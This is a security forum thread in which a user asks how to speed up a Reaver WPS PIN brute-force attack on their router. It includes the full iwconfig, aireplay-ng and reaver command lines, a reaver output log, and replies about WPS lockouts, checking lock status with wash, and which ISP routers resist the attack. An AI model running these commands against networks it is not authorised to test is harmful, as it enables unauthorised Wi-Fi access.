Jump to content

Reaver --- Can't get faster than 42 seconds per pin!


burnface

Recommended Posts

So I'm not sure where to ask this, the mods at the Kali forums called this "general IT help" and deleted my question ha.


Anyway, I've been playing around with Reaver again with my new router, and like the title says, can't seem to get any faster than 42-ish seconds per pin.


The commands I used to even get it that 'fast' are as follows:


Change my interface to same channel as router:



iwconfig mon0 channel 1



Manually associate to my router:



aireplay-ng -1 0 -a <router bssid> -h <my mac address, of mon0> -e <router essid> mon0 --ignore-negative-one



My use of reaver:



reaver -i mon0 -b <router bssid> -T 1 -f -N -S -vv



All these commands are combinations of different suggestions I've seen places online, and this is what I've done to get it faster than the 50-60 sec/pin that I was getting :/


I've also tried using -r to make it pause for 60sec after 10 pin attempts, but then I would go up to 55 sec/pin again.


I've had roughly -50 power the whole time during this test.


Here's a chunk of my code running it overnight:



[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 15535672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 15535672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 14.19% complete @ 2014-08-09 08:21:06 (43 seconds/pin)
[+] Max time remaining at this rate: 112:44:37 (9439 pins left to try)
[+] Trying pin 15535672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 15535672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response



Any suggestions that might speed this up?

Thanks!!

Link to comment
Share on other sites

There should be options to try and increase the speed, but by it's nature, it is a slow attack.

I am using many of those options already, and even though it's slow, I shouldn't take more that 14 hours max. If mine keeps up like this, it is estimating over 115 hours! I will look into more ways to speed it up as well.

Thank you!

Link to comment
Share on other sites

Keep in mind, the attack is limited by the access points response and calculations of PINs. Some versions may have lockout times as well to thwart the attack.

I have been looking into that as much as I know how, but from what I can tell from the code, my router isn't actually locking the attack out? Or is that what the "WARNING: Receive Timeout Occurred" means?

Thanks again!

Link to comment
Share on other sites

It can take days to crack a WPS if the router is set to lock out after so many failed attempts. In the real world you're looking at least 10+ hours to days at a slow pin try rate.

Newer routers these days will lock wps if too many failed try's are made people in videos that crack wps are either lucky or they have speeded up the time

Link to comment
Share on other sites

It can take days to crack a WPS if the router is set to lock out after so many failed attempts. In the real world you're looking at least 10+ hours to days at a slow pin try rate.

Newer routers these days will lock wps if too many failed try's are made people in videos that crack wps are either lucky or they have speeded up the time

If the router locks wps, wouldn't that show in the running code? Also thanks for the reply!

Link to comment
Share on other sites

If the router locks wps, wouldn't that show in the running code? Also thanks for the reply!

Nope, what will happen is it should start giving errors and possibly keep trying the same pin over and over the only way to see if the router has locked wps is to run wash -i mon0 to see if wps lock says yes,

You wanna make sure that you had a good signal to the target router at least over 50 otherwise you're gonna have signal issues. a 70% Signal should be good if it stays like that.

ISP's here in the US like Comcast and Centurylink offer their customers pretty much a wps attack proof router / dsl/ cable bundle i've came across routers that start with like HOME- are a comcast customer and likely have a Technicolor router and i've tried targeting them they lock wps after 3 try's even at a slow rate.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...